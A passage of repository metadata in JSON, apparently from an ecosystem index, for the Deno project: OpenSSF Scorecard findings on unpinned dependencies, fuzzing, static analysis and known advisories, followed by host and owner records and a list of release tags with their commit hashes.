not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/